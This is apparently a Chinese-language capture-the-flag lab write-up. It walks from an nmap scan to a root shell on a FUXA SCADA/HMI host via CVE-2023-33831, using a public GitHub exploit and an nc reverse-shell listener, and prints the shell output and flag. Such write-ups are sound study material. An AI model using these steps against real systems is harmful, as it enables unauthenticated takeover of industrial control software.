主要知识点
- 即使web应用不好用,无法打开,也可以尝试入侵后台
具体步骤
nmap扫描,22/1881端口开放,而1881端口运行了FUXA
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 06:30 UTC
Nmap scan report for #remote_ip#
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1881/tcp open http Node.js Express framework
|_http-title: FUXA
|_http-cors: GET POST PUT DELETE
访问1881端口,发现FUXA v1.15版本正在运行,但是报错
搜索一下FUXA的vulnerability,得到CVE-2023-33831,当然了,和靶机的标题一样,估计肯定是这个了,GitHub - rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831: Description and exploit of CVE-2023-33831 affecting FUXA web-based Process Visualization (SCADA/HMI/Dashboard) software.
下载后现在本地执行nc -nlvp 80,再执行exp,得到root权限,好像很简单,并不会太难
C:\home\kali\Documents\OFFSEC\GoToWork\CVE-2023-33831> nc -nlvp 80
listening on [any] 80 ...
connect to [#remote_ip#] from (UNKNOWN) [#local_ip#] 33770
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/proof.txt
a5c7287ff6267099143f14c60506aac0
#